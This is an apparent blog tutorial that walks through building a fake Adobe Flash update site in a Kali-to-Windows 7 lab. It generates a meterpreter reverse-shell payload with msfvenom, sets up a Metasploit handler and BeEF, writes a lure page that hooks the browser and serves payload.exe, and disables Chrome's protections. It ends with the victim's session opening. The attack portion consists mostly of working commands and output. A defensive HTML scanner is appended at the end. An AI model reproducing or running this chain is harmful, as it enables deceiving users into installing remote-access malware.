
Building a Fake Update Site

Category: Security / Information Gathering, 2017. 11. 13. 21:10

- Systems used

Kali Linux

Windows 7


- Adobe Flash fake update


(kali)

- Generate the payload

# cd /var/www/html

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.27.50 LPORT=4444 \
    -f exe -o payload.exe


# ls

 

 index.html  payload.exe

 


[TERM1]

# msfconsole

 

 msf > load msgrpc Pass=abc123

[*] MSGRPC Service:  127.0.0.1:55552 

[*] MSGRPC Username: msf

[*] MSGRPC Password: abc123

[*] Successfully loaded plugin: msgrpc

msf > 

msf > use exploit/multi/handler 
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 192.168.27.50
LHOST => 192.168.27.50
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.27.50    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.27.50:4444 
[*] Starting the payload handler...

 


[TERM2]

# cd /usr/share/beef-xss

# ./beef -x

 

[20:43:56][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].

[20:43:56][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha

[20:43:56]    |   Twit: @beefproject

[20:43:56]    |   Site: http://beefproject.com

[20:43:56]    |   Blog: http://blog.beefproject.com

[20:43:56]    |_  Wiki: https://github.com/beefproject/beef/wiki

[20:43:56][*] Project Creator: Wade Alcorn (@WadeAlcorn)

[20:43:57][*] Successful connection with Metasploit.

[20:44:01][*] Loaded 297 Metasploit exploits.

[20:44:01][*] Resetting the database for BeEF.

[20:44:02][*] BeEF is loading. Wait a few seconds...

[20:44:20][*] 13 extensions enabled.

[20:44:20][*] 550 modules enabled.

[20:44:20][*] 3 network interfaces were detected.

[20:44:20][+] running on network interface: 127.0.0.1

[20:44:20]    |   Hook URL: http://127.0.0.1:3000/hook.js

[20:44:20]    |_  UI URL:   http://127.0.0.1:3000/ui/panel

[20:44:20][+] running on network interface: 192.168.17.50

[20:44:20]    |   Hook URL: http://192.168.17.50:3000/hook.js

[20:44:20]    |_  UI URL:   http://192.168.17.50:3000/ui/panel

[20:44:20][+] running on network interface: 192.168.27.50

[20:44:20]    |   Hook URL: http://192.168.27.50:3000/hook.js

[20:44:20]    |_  UI URL:   http://192.168.27.50:3000/ui/panel

[20:44:20][*] RESTful API key: 4633f1e85c608a41c26864e550860f9372997d36

[20:44:20][*] HTTP Proxy: http://127.0.0.1:6789

[20:44:20][*] BeEF server started (press control+c to stop)


 


[TERM3]

# cd /var/www/html

# vi index.html

 

<!DOCTYPE html>

<html>

<head>

<title>Adobe flash</title>

<script src="http://192.168.27.50:3000/hook.js"></script>

</head>

<body><center>

<img src="adobe.png" alt="adobe" width="204" height="204">

<p>

<input type="button" name="btnDownload" value="Update" onclick="window.open('payload.exe','download'); return false;"/>

</p>

</center></body>

</html>

 

> Download a suitable adobe.png image.


# ls

 

 adobe.png  index.html  payload.exe

 


# service apache2 restart


# firefox http://192.168.27.50:3000/ui/panel &

ID beef    PASS beef


(win7)

Chrome: "chrome://settings/" > Advanced > turn off "Protect you and your device from dangerous sites"



Browse to http://192.168.27.50

> The image and button we set up are displayed.


(kali) 

Command > Social Engineering > Fake Flash Update  > execute

Image : http://192.168.27.50:3000/adobe/flash_update.png

Payload : Custom_Payload

Custom Payload URL  : http://192.168.27.50/payload.exe


(win7)


> A convincing-looking window pops up, and when INSTALL is clicked,


> payload.exe is installed. Then, when the payload is run, it connects to msfconsole.


(kali)

[TERM1]

 

 [*] Sending stage (957487 bytes) to 192.168.27.202

[*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.202:49778) at 2017-11-13 21:05:36 +0900


meterpreter > 

meterpreter > sysinfo
Computer        : ADMINSTRATOR-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 192.168.27.202 - Meterpreter session 1 closed.  Reason: User exit

 

> The session connected and access was obtained.
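
From the defender's side, the index.html built above has two traits that can be checked statically: a script loaded from a hook.js path (BeEF's default hook, on port 3000 in this lab) and a button whose handler opens an executable. The following heuristic triage scanner is an added example, not part of the original post; the rule names, severity labels and both sample pages are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Quoted string ending in an executable extension, e.g. inside an onclick handler
QUOTED_EXE = re.compile(r"""['"]([^'"]+\.(?:exe|scr|msi))['"]""", re.I)
EXE_PATH = re.compile(r"\.(?:exe|scr|msi)$", re.I)

class LureScanner(HTMLParser):
    """Collects (severity, rule, detail) tuples while parsing a page."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            u = urlparse(a["src"])
            # BeEF serves its hook as /hook.js, by default on port 3000
            if u.path.lower().rsplit("/", 1)[-1] == "hook.js":
                sev = "high" if u.netloc.endswith(":3000") else "medium"
                self.findings.append((sev, "beef-style-hook", a["src"]))
        for name, value in a.items():
            if name.startswith("on"):          # inline event handlers
                hits = QUOTED_EXE.findall(value)
            elif name == "href" and EXE_PATH.search(urlparse(value).path):
                hits = [value]
            else:
                hits = []
            for h in hits:
                self.findings.append(("high", "executable-download", f"{tag}[{name}] -> {h}"))

def scan(html):
    """Return all findings for one HTML document."""
    s = LureScanner()
    s.feed(html)
    s.close()
    return s.findings

# Constructed samples: LURE mirrors the traits of the page above, BENIGN is a control.
LURE = """<html><head><title>Adobe flash</title>
<script src="http://192.168.27.50:3000/hook.js"></script></head>
<body><input type="button" value="Update"
 onclick="window.open('payload.exe','download'); return false;"/></body></html>"""
BENIGN = '<html><head><script src="/static/app.js"></script></head><body><a href="/docs/guide.pdf">Guide</a></body></html>'

if __name__ == "__main__":
    for finding in scan(LURE):
        print(finding)
```

A hit on either rule is a reason to pull the page for review, not proof of compromise: legitimate download pages also link to installers, and a hook can be served under another file name.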

